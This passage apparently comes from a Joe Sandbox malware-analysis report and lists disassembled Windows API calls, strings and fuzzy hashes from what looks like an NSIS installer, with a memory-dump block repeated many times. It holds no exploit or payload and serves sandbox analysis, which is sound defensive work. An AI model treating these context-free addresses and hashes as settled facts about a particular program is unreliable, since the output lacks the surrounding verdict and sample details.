                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                      • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                      • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                      • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                      • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                      • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                      • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                      • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                      • DeleteObject.GDI32(?), ref: 00404AA5
                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                      • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                      • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                      • GlobalFree.KERNEL32(?), ref: 00404DD8
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                      • ShowWindow.USER32(?,00000000), ref: 00404F75
                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                      • ShowWindow.USER32(00000000), ref: 00404F87
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $ @$M$N
                                      • API String ID: 1638840714-3479655940
                                      • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                      • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                      • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                      • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                      APIs
                                      • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                      • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                      • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                      • lstrlenW.KERNEL32(?), ref: 00406D58
                                      • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                      • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                      • FindClose.KERNEL32(?), ref: 00406E5F
                                      Strings
                                      • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                      • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                      • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                      • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                      • \*.*, xrefs: 00406D2F
                                      • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                      • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                      • ptF, xrefs: 00406D1A
                                      • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                      • API String ID: 2035342205-1650287579
                                      • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                      • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                      • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                      • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                      APIs
                                      • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                      • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                      • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                      • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                      • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                      • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                      • SetWindowTextW.USER32(?,?), ref: 004045AF
                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                      • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                      • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                      • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                        • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                        • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                        • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                        • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                        • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                        • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                      • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                      • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                      • String ID: F$A
                                      • API String ID: 3347642858-1281894373
                                      • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                      • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                      • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                      • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                      • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                      • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                      • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                      • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                      • CloseHandle.KERNEL32(?), ref: 00407212
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                      • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                      • API String ID: 1916479912-1189179171
                                      • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                      • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                      • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                      • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                      APIs
                                      • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                      • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                      • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                      • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                      • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406A73
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                      • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 3581403547-1792361021
                                      • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                      • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                      • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                      • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                      APIs
                                      • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                      Strings
                                      • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: CreateInstance
                                      • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                      • API String ID: 542301482-1377821865
                                      • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                      • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                      • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                      • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                      • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                      • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                      • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                      • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                      • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                      • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                      • lstrlenW.KERNEL32(?), ref: 004063F8
                                      • GetVersionExW.KERNEL32(?), ref: 00406456
                                        • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                      • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                      • GlobalFree.KERNEL32(?), ref: 00406509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                      • API String ID: 20674999-2124804629
                                      • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                      • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                      • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                      • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                      APIs
                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                      • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                      • GetSysColor.USER32(?), ref: 004041DB
                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                      • lstrlenW.KERNEL32(?), ref: 00404202
                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                        • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                      • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                      • SendMessageW.USER32(00000000), ref: 0040427D
                                      • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                      • SetCursor.USER32(00000000), ref: 004042FE
                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                      • SetCursor.USER32(00000000), ref: 00404322
                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
